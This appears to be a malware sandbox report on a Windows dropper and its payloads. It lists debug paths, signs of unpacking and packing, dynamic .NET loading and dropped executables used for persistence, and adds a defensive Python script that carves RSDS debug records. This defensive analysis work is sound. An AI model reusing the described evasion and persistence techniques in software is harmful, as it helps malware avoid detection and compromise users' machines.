                      Source: Binary string: [+C:\mubinidefup56_bum.pdbh source: OG9rNsihJ7.exe, 00000000.00000002.238062965.0000000000401000.00000020.00020000.sdmp, OG9rNsihJ7.exe, 00000000.00000000.231517264.0000000000401000.00000020.00020000.sdmp, OG9rNsihJ7.exe, 00000001.00000000.236309691.0000000000401000.00000020.00020000.sdmp, vfgiwcs, 00000012.00000000.326118526.0000000000401000.00000020.00020000.sdmp, vfgiwcs, 00000012.00000002.333467369.0000000000401000.00000020.00020000.sdmp, vfgiwcs, 00000013.00000000.329837112.0000000000401000.00000020.00020000.sdmp, BFBD.exe, 00000016.00000002.355073966.0000000000401000.00000020.00020000.sdmp, BFBD.exe, 00000016.00000000.344254452.0000000000401000.00000020.00020000.sdmp, BFBD.exe, 00000018.00000000.351452912.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: msvcr100.i386.pdb source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
                      Source: Binary string: C:\mubinidefup56_bum.pdb source: OG9rNsihJ7.exe, OG9rNsihJ7.exe, 00000000.00000002.238062965.0000000000401000.00000020.00020000.sdmp, OG9rNsihJ7.exe, 00000000.00000000.231517264.0000000000401000.00000020.00020000.sdmp, OG9rNsihJ7.exe, 00000001.00000000.236309691.0000000000401000.00000020.00020000.sdmp, vfgiwcs, 00000012.00000000.326118526.0000000000401000.00000020.00020000.sdmp, vfgiwcs, 00000012.00000002.333467369.0000000000401000.00000020.00020000.sdmp, vfgiwcs, 00000013.00000000.329837112.0000000000401000.00000020.00020000.sdmp, BFBD.exe, 00000016.00000002.355073966.0000000000401000.00000020.00020000.sdmp, BFBD.exe, 00000016.00000000.344254452.0000000000401000.00000020.00020000.sdmp, BFBD.exe, 00000018.00000000.351452912.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000001A.00000003.361098362.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000001A.00000003.361098362.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000001A.00000003.361098362.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: Kernel.Appcore.pdbv source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000001A.00000003.355300183.0000000003672000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.356247461.0000000003672000.00000004.00000001.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: B1B2.exe, 00000014.00000000.334478486.0000000000413000.00000002.00020000.sdmp, B1B2.exe, 00000014.00000000.343212792.0000000000413000.00000002.00020000.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000001A.00000003.361098362.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: /C:\vofihewakizabu\tesuvahatu\woru.pdbh source: 3136.exe, 0000001D.00000000.359623622.0000000000401000.00000020.00020000.sdmp, 3136.exe, 0000001D.00000002.381021289.00000000008F9000.00000004.00000001.sdmp, xqfkdfcl.exe, 0000002A.00000000.380594981.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: fltLib.pdbr source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdbt source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdbk source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
                      Source: Binary string: shell32.pdbV source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb\ source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdbZ source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb" source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdbk source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdbura source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
                      Source: Binary string: C:\vofihewakizabu\tesuvahatu\woru.pdb source: 3136.exe, 0000001D.00000000.359623622.0000000000401000.00000020.00020000.sdmp, 3136.exe, 0000001D.00000002.381021289.00000000008F9000.00000004.00000001.sdmp, xqfkdfcl.exe, 0000002A.00000000.380594981.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000001A.00000003.355319445.0000000003678000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.355100434.0000000003678000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.355698589.0000000003678000.00000004.00000001.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 0000001A.00000003.361098362.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 0000001A.00000003.361098362.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: B1B2.exe, 00000014.00000000.334478486.0000000000413000.00000002.00020000.sdmp, B1B2.exe, 00000014.00000000.343212792.0000000000413000.00000002.00020000.sdmp
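The `Binary string: ... .pdb` rows above are CodeView debug records, either still present in the image's debug directory or recovered from memory dumps (the stray trailing characters such as `pdbk` and `pdbh` are the bytes that happened to follow the string in memory). The WerFault.exe entries are ordinary Microsoft system-DLL PDB names loaded during crash reporting and carry no signal. The paths attributed to the samples themselves do: C:\mubinidefup56_bum.pdb, C:\xore salafoyukumabu3\ra.pdb, C:\vofihewakizabu\tesuvahatu\woru.pdb and C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb are root-level or random-syllable directories of the same flavour as the section names, which points at an automated packer build rather than a developer's project tree, and the identical path shared by OG9rNsihJ7.exe, vfgiwcs and BFBD.exe confirms those three are copies of one build. The following Python is an added example and not code from the report or the sandbox: it carves RSDS records out of an arbitrary byte blob (file or dump), derives the key a symbol server would be asked for, and applies a crude heuristic for throwaway build paths. The sample blob, the build-tree token list and the heuristic are constructed assumptions.

```python
import re
import uuid

# CodeView "RSDS" record as written by the MSVC linker: signature, 16-byte GUID (first
# three fields little-endian), 4-byte age, then the NUL-terminated PDB path.
RSDS_RE = re.compile(rb"RSDS(.{16})(.{4})([\x20-\x7e]{1,260}?)\x00", re.DOTALL)

# Assumed directory names that appear in genuine build trees; a path that contains one
# of these is not treated as throwaway even if it is all lowercase.
BUILD_TREE_TOKENS = {"release", "debug", "x64", "x86", "win32", "bin", "obj", "src",
                     "source", "build", "builds", "users", "projects", "project", "work",
                     "_work", "git", "dev", "code", "repos", "agent", "jenkins", "teamcity"}


def find_codeview_records(blob: bytes):
    """Return one dict per RSDS record found anywhere in blob."""
    records = []
    for m in RSDS_RE.finditer(blob):
        guid = uuid.UUID(bytes_le=m.group(1))          # handles the mixed-endian layout
        age = int.from_bytes(m.group(2), "little")
        path = m.group(3).decode("ascii")
        pdb_name = path.replace("/", "\\").rsplit("\\", 1)[-1]
        records.append({
            "offset": m.start(),
            "guid": str(guid),
            "age": age,
            "path": path,
            # Microsoft symbol server layout: <pdb>/<GUID hex upper><age hex>/<pdb>
            "symsrv_key": f"{pdb_name}/{guid.hex.upper()}{age:X}/{pdb_name}",
        })
    return records


def looks_like_throwaway_build(path: str) -> bool:
    """Heuristic for paths like the ones in this report: the PDB sits at the drive root
    or under directories made only of lowercase syllables, with no recognisable
    build-tree component. Expect false positives on minimalist CI layouts."""
    parts = path.replace("/", "\\").split("\\")
    dirs = [d for d in parts[1:-1] if d]          # drop the drive and the file name
    if not dirs:
        return True                                # e.g. C:\mubinidefup56_bum.pdb
    if any(d.lower() in BUILD_TREE_TOKENS for d in dirs):
        return False
    return all(re.fullmatch(r"[a-z0-9_ ]+", d) for d in dirs)


def build_sample_blob() -> bytes:
    """Constructed buffer with two RSDS records, one carrying a path taken from the
    report and one a plausible legitimate build path, surrounded by filler bytes.
    These are not bytes from the analysed sample."""
    def rsds(guid_le: bytes, age: int, path: str) -> bytes:
        return b"RSDS" + guid_le + age.to_bytes(4, "little") + path.encode() + b"\0"
    return (b"\x90" * 32
            + rsds(bytes(range(16)), 1, r"C:\mubinidefup56_bum.pdb")
            + b"\xcc" * 16
            + rsds(bytes(range(16, 32)), 3, r"C:\projects\agent\x64\Release\agent.pdb")
            + b"\0" * 8)


if __name__ == "__main__":
    for rec in find_codeview_records(build_sample_blob()):
        flag = "SUSPICIOUS" if looks_like_throwaway_build(rec["path"]) else "ok"
        print(f"{rec['offset']:#06x} {flag:10} {rec['path']}  ({rec['symsrv_key']})")
```

Carving by signature rather than walking IMAGE_DIRECTORY_ENTRY_DEBUG is deliberate: it works on the memory dumps the report's strings came from, where the headers may already be overwritten, and on unpacked payloads whose debug directory was stripped by the packer but whose RSDS blob survived. The symbol-server key is the quickest way to check whether a PDB path belongs to a real Microsoft or vendor build.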

Data Obfuscation:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\254E.exe | Unpacked PE file: 28.2.254E.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\3136.exe | Unpacked PE file: 29.2.3136.exe.400000.0.unpack
Source: C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe | Unpacked PE file: 42.2.xqfkdfcl.exe.400000.0.unpack
Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Temp\254E.exe | Unpacked PE file: 28.2.254E.exe.400000.0.unpack .text:ER;.data:W;.wuxut:W;.tijayu:W;.zemoyi:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\3136.exe | Unpacked PE file: 29.2.3136.exe.400000.0.unpack .text:ER;.data:W;.yocinoj:W;.lebe:W;.wuno:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe | Unpacked PE file: 42.2.xqfkdfcl.exe.400000.0.unpack .text:ER;.data:W;.yocinoj:W;.lebe:W;.wuno:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
.NET source code contains potential unpacker
Source: 8017.exe.5.dr, Univesity_Grade_Calculator/Form1.cs | .Net Code: Form1_Load System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2F32.exe.5.dr, CoreApi.cs | .Net Code: Start System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
.NET source code contains method to dynamically call methods (often used by packers)
Source: 3BC6.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 30.0.3BC6.exe.650000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 30.0.3BC6.exe.650000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 30.2.3BC6.exe.650000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 30.0.3BC6.exe.650000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 30.0.3BC6.exe.650000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 45.0.3BC6.exe.3c0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: C:\Users\user\Desktop\OG9rNsihJ7.exe | Code function: 0_2_005F3634 push es; iretd
Source: C:\Users\user\Desktop\OG9rNsihJ7.exe | Code function: 1_2_00401880 push esi; iretd
Source: C:\Users\user\Desktop\OG9rNsihJ7.exe | Code function: 1_2_00402E94 push es; iretd
Source: C:\Users\user\Desktop\OG9rNsihJ7.exe | Code function: 1_1_00402E94 push es; iretd
Source: C:\Users\user\AppData\Roaming\vfgiwcs | Code function: 18_2_00643634 push es; iretd
Source: C:\Users\user\AppData\Roaming\vfgiwcs | Code function: 19_2_00401880 push esi; iretd
Source: C:\Users\user\AppData\Roaming\vfgiwcs | Code function: 19_2_00402E94 push es; iretd
Source: C:\Users\user\AppData\Local\Temp\B1B2.exe | Code function: 20_2_00412CA4 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\B1B2.exe | Code function: 20_2_0207123C push edi; iretd
Source: C:\Users\user\AppData\Local\Temp\B1B2.exe | Code function: 20_2_0207127E push edi; iretd
Source: C:\Users\user\AppData\Local\Temp\B1B2.exe | Code function: 20_2_0207735E push esp; iretd
Source: C:\Users\user\AppData\Local\Temp\B1B2.exe | Code function: 20_2_020753C8 pushfd ; retf
Source: C:\Users\user\AppData\Local\Temp\BFBD.exe | Code function: 22_2_009003D8 push esi; ret
Source: C:\Users\user\AppData\Local\Temp\BFBD.exe | Code function: 22_2_0090043D push esi; ret
Source: C:\Users\user\AppData\Local\Temp\BFBD.exe | Code function: 24_2_00401880 push esi; iretd
Source: C:\Users\user\AppData\Local\Temp\BFBD.exe | Code function: 24_2_00402E94 push es; iretd
Source: C:\Users\user\AppData\Local\Temp\BFBD.exe | Code function: 24_1_00402E94 push es; iretd
Source: C:\Users\user\AppData\Local\Temp\254E.exe | Code function: 28_2_004139B0 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\254E.exe | Code function: 28_2_006D3C00 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\3136.exe | Code function: 29_2_0042C248 push esp; retn 0042h
Source: C:\Users\user\AppData\Local\Temp\3136.exe | Code function: 29_2_008EDE68 push 0000002Bh; iretd
Source: C:\Users\user\AppData\Local\Temp\3136.exe | Code function: 29_2_008EB672 push ds; ret
Source: C:\Users\user\AppData\Local\Temp\3BC6.exe | Code function: 30_2_00658508 push 00000028h; retf 0000h
Source: C:\Users\user\AppData\Local\Temp\3BC6.exe | Code function: 30_2_0065764A push esp; ret
Source: C:\Users\user\AppData\Local\Temp\3BC6.exe | Code function: 30_2_02954003 push esi; retf
Source: C:\Users\user\AppData\Local\Temp\3BC6.exe | Code function: 30_2_04FACF78 pushfd ; retf
Source: C:\Users\user\AppData\Local\Temp\3BC6.exe | Code function: 30_2_04FACF3A pushad ; retf
Source: C:\Users\user\AppData\Local\Temp\3BC6.exe | Code function: 30_2_04FACF38 pushad ; retf
Source: C:\Users\user\Desktop\OG9rNsihJ7.exe | Code function: 0_2_00435870 LoadLibraryA,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,
Source: 54AF.exe.5.dr | Static PE information: 0xAB35ADD6 [Sat Jan 8 14:57:26 2061 UTC]
Source: OG9rNsihJ7.exe | Static PE information: section name: .zafif
Source: OG9rNsihJ7.exe | Static PE information: section name: .naladin
Source: OG9rNsihJ7.exe | Static PE information: section name: .ger
Source: 3A7E.exe.5.dr | Static PE information: section name:
Source: 3A7E.exe.5.dr | Static PE information: section name:
Source: 3A7E.exe.5.dr | Static PE information: section name:
Source: 3A7E.exe.5.dr | Static PE information: section name:
Source: 3A7E.exe.5.dr | Static PE information: section name:
Source: 3A7E.exe.5.dr | Static PE information: section name:
Source: 3A7E.exe.5.dr | Static PE information: section name: .28gybOo
Source: 3A7E.exe.5.dr | Static PE information: section name: .adata
Source: 54AF.exe.5.dr | Static PE information: section name: .didata
Source: 6AF7.exe.5.dr | Static PE information: section name: _RDATA
Source: 7808.exe.5.dr | Static PE information: section name:
Source: 7808.exe.5.dr | Static PE information: section name:
Source: 7808.exe.5.dr | Static PE information: section name:
Source: 7808.exe.5.dr | Static PE information: section name:
Source: 7808.exe.5.dr | Static PE information: section name:
Source: 7808.exe.5.dr | Static PE information: section name:
Source: 7808.exe.5.dr | Static PE information: section name: .kujN2o2
Source: 7808.exe.5.dr | Static PE information: section name: .adata
Source: 9789.exe.5.dr | Static PE information: section name:
Source: 9789.exe.5.dr | Static PE information: section name:
Source: 9789.exe.5.dr | Static PE information: section name:
Source: 9789.exe.5.dr | Static PE information: section name:
Source: 9789.exe.5.dr | Static PE information: section name:
Source: 9789.exe.5.dr | Static PE information: section name:
Source: 9789.exe.5.dr | Static PE information: section name: .wZtCyLX
Source: 9789.exe.5.dr | Static PE information: section name: .adata
Source: BFBD.exe.5.dr | Static PE information: section name: .zafif
Source: BFBD.exe.5.dr | Static PE information: section name: .naladin
Source: BFBD.exe.5.dr | Static PE information: section name: .ger
Source: 254E.exe.5.dr | Static PE information: section name: .wuxut
Source: 254E.exe.5.dr | Static PE information: section name: .tijayu
Source: 254E.exe.5.dr | Static PE information: section name: .zemoyi
Source: 3136.exe.5.dr | Static PE information: section name: .yocinoj
Source: 3136.exe.5.dr | Static PE information: section name: .lebe
Source: 3136.exe.5.dr | Static PE information: section name: .wuno
Source: 2473.exe.5.dr | Static PE information: section name: _RDATA
Source: vfgiwcs.5.dr | Static PE information: section name: .zafif
Source: vfgiwcs.5.dr | Static PE information: section name: .naladin
Source: vfgiwcs.5.dr | Static PE information: section name: .ger
Source: xqfkdfcl.exe.29.dr | Static PE information: section name: .yocinoj
Source: xqfkdfcl.exe.29.dr | Static PE information: section name: .lebe
Source: xqfkdfcl.exe.29.dr | Static PE information: section name: .wuno
Source: initial sample | Static PE information: section where entry point is pointing to: .didata
Source: 2F32.exe.5.dr | Static PE information: real checksum: 0x0 should be: 0x1298c
Source: 3BC6.exe.5.dr | Static PE information: real checksum: 0x0 should be: 0x9011f
Source: 88E2.exe.5.dr | Static PE information: real checksum: 0x0 should be: 0x16c4f5
Source: 9789.exe.5.dr | Static PE information: real checksum: 0x374ffe should be: 0x376ae8
Source: 7808.exe.5.dr | Static PE information: real checksum: 0x373823 should be: 0x3738f9
Source: 3A7E.exe.5.dr | Static PE information: real checksum: 0x3721bb should be: 0x373654
Source: initial sample | Static PE information: section name: .text entropy: 6.96452184589
Source: initial sample | Static PE information: section name: entropy: 7.99714766582
Source: initial sample | Static PE information: section name: entropy: 7.90784224501
Source: initial sample | Static PE information: section name: entropy: 7.99361781473
Source: initial sample | Static PE information: section name: entropy: 7.80912989946
Source: initial sample | Static PE information: section name: .rsrc entropy: 7.22348700263
Source: initial sample | Static PE information: section name: .28gybOo entropy: 7.91849564721
Source: initial sample | Static PE information: section name: .didata entropy: 7.99713235918
Source: initial sample | Static PE information: section name: entropy: 7.99715248044
Source: initial sample | Static PE information: section name: entropy: 7.90789134233
Source: initial sample | Static PE information: section name: entropy: 7.99431797903
Source: initial sample | Static PE information: section name: entropy: 7.81839424264
Source: initial sample | Static PE information: section name: .rsrc entropy: 7.22755578232
Source: initial sample | Static PE information: section name: .kujN2o2 entropy: 7.91856580958
Source: initial sample | Static PE information: section name: entropy: 7.99718008782
Source: initial sample | Static PE information: section name: entropy: 7.90089759273
Source: initial sample | Static PE information: section name: entropy: 7.99420883161
Source: initial sample | Static PE information: section name: entropy: 7.81503956549
Source: initial sample | Static PE information: section name: .rsrc entropy: 7.2242765671
Source: initial sample | Static PE information: section name: .wZtCyLX entropy: 7.91808927088
Source: initial sample | Static PE information: section name: .text entropy: 6.96452184589
Source: initial sample | Static PE information: section name: .text entropy: 6.982589812
Source: initial sample | Static PE information: section name: .text entropy: 6.96652464212
Source: initial sample | Static PE information: section name: .text entropy: 6.96452184589
Source: initial sample | Static PE information: section name: .text entropy: 6.96652464212
                      Source: 3BC6.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 3BC6.exe.5.dr, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 30.0.3BC6.exe.650000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 30.0.3BC6.exe.650000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 30.0.3BC6.exe.650000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 30.0.3BC6.exe.650000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 30.2.3BC6.exe.650000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 30.2.3BC6.exe.650000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 30.0.3BC6.exe.650000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 30.0.3BC6.exe.650000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 30.0.3BC6.exe.650000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 30.0.3BC6.exe.650000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 45.0.3BC6.exe.3c0000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 45.0.3BC6.exe.3c0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'

                      Persistence and Installation Behavior:

                      Drops executables to the Windows directory (C:\Windows) and starts them
                      Source: unknown | Executable created and started: C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\vfgiwcs
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\FC2A.exe
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\9789.exe
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\88E2.exe
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\7808.exe
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\2473.exe
                      Source: C:\Users\user\AppData\Local\Temp\3136.exe | File created: C:\Users\user\AppData\Local\Temp\xqfkdfcl.exe
                      Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe (copy)
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\254E.exe
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\B1B2.exe
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\BFBD.exe
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\3BC6.exe
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\3A7E.exe
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\45AA.exe
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\2F32.exe
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\54AF.exe
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\6AF7.exe
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\8017.exe
